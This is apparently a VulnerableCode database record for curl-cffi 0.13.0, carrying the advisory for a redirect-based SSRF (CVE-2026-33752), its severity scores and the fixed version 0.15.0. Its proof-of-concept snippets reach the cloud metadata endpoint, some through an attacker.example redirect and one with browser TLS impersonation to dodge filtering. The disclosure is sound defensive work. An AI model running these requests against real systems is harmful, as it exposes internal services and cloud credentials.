Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:pypi/curl-cffi@0.13.0
Typepypi
Namespace
Namecurl-cffi
Version0.13.0
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version0.15.0
Latest_non_vulnerable_version0.15.0
Affected_by_vulnerabilities
0
url VCID-8hn5-vcby-1yfu
vulnerability_id VCID-8hn5-vcby-1yfu
summary 
curl_cffi: Redirect-based SSRF leads to internal network access in curl_cffi (with TLS impersonation bypass)
### Summary
curl_cffi does not restrict requests to internal IP ranges, and follows redirects automatically via the underlying libcurl.

Because of this, an attacker-controlled URL can redirect requests to internal services such as cloud metadata endpoints. In addition, curl_cffi’s TLS impersonation feature can make these requests appear as legitimate browser traffic, which may bypass certain network controls.

### Details
The issue comes from how curl_cffi handles outbound requests
- User-supplied URLs are passed directly to libcurl without checking whether they resolve to internal IP ranges (e.g., 127.0.0.1, 169.254.0.0/16).
- Redirects are automatically followed (CURLOPT_FOLLOWLOCATION = 1) inside libcurl.
- There is no validation of redirect destinations at the Python layer.

This means that even if an application only allows requests to external URLs, an attacker can
- Provide a URL pointing to an attacker-controlled server
- Return a redirect response pointing to an internal service
- Have curl_cffi follow that redirect automatically

As a result, internal endpoints (such as cloud instance metadata APIs) can be accessed.

Additionally, curl_cffi supports TLS fingerprint impersonation (e.g., impersonate="chrome"). In environments where outbound requests are filtered based on TLS fingerprinting, this can make such requests harder to detect or block

This behavior is similar to previously reported redirect-based SSRF issues such as CVE-2025-68616, where redirects allowed access to unintended internal resources.

### PoC
1. Direct internal request
```
import curl_cffi
resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/")
print(resp.text)
```
2. Redirect to internal service
Attacker server:
```
GET /test
→ 302 Location: http://169.254.169.254/latest/meta-data/
```
Victim code:
```
import curl_cffi
resp = curl_cffi.get("https://attacker.example/test")
print(resp.text)
```
Result
- Initial request goes to attacker server
- Redirect is returned
- libcurl follows the redirect automatically
- Internal metadata endpoint is accessed

3. With TLS impersonation
```
import curl_cffi\
resp = curl_cffi.get(
    "https://attacker.example/test",
    impersonate="chrome")
```
In some environments, this may help the request bypass TLS-based filtering controls.


### Impact
An attacker who can control the requested URL may be able to:
- Access internal network services
- Reach cloud metadata endpoints and retrieve sensitive information
- Bypass certain outbound filtering mechanisms (depending on environment)
This corresponds to CWE-918 Server-Side Request Forgery.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-33752
reference_id
reference_type
scores
0
value 0.00021
scoring_system epss
scoring_elements 0.05896
published_at 2026-06-09T12:55:00Z
1
value 0.00021
scoring_system epss
scoring_elements 0.05922
published_at 2026-06-05T12:55:00Z
2
value 0.00021
scoring_system epss
scoring_elements 0.05913
published_at 2026-06-06T12:55:00Z
3
value 0.00021
scoring_system epss
scoring_elements 0.05915
published_at 2026-06-07T12:55:00Z
4
value 0.00021
scoring_system epss
scoring_elements 0.05871
published_at 2026-06-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-33752
1
reference_url https://github.com/lexiforest/curl_cffi
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/lexiforest/curl_cffi
2
reference_url https://github.com/lexiforest/curl_cffi/security/advisories/GHSA-qw2m-4pqf-rmpp
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-06T15:34:30Z/
url https://github.com/lexiforest/curl_cffi/security/advisories/GHSA-qw2m-4pqf-rmpp
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-33752
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-33752
4
reference_url https://github.com/advisories/GHSA-qw2m-4pqf-rmpp
reference_id GHSA-qw2m-4pqf-rmpp
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-qw2m-4pqf-rmpp
fixed_packages
0
url pkg:pypi/curl-cffi@0.15.0
purl pkg:pypi/curl-cffi@0.15.0
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/curl-cffi@0.15.0
aliases CVE-2026-33752, GHSA-qw2m-4pqf-rmpp
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8hn5-vcby-1yfu
Fixing_vulnerabilities
Risk_score4.0
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:pypi/curl-cffi@0.13.0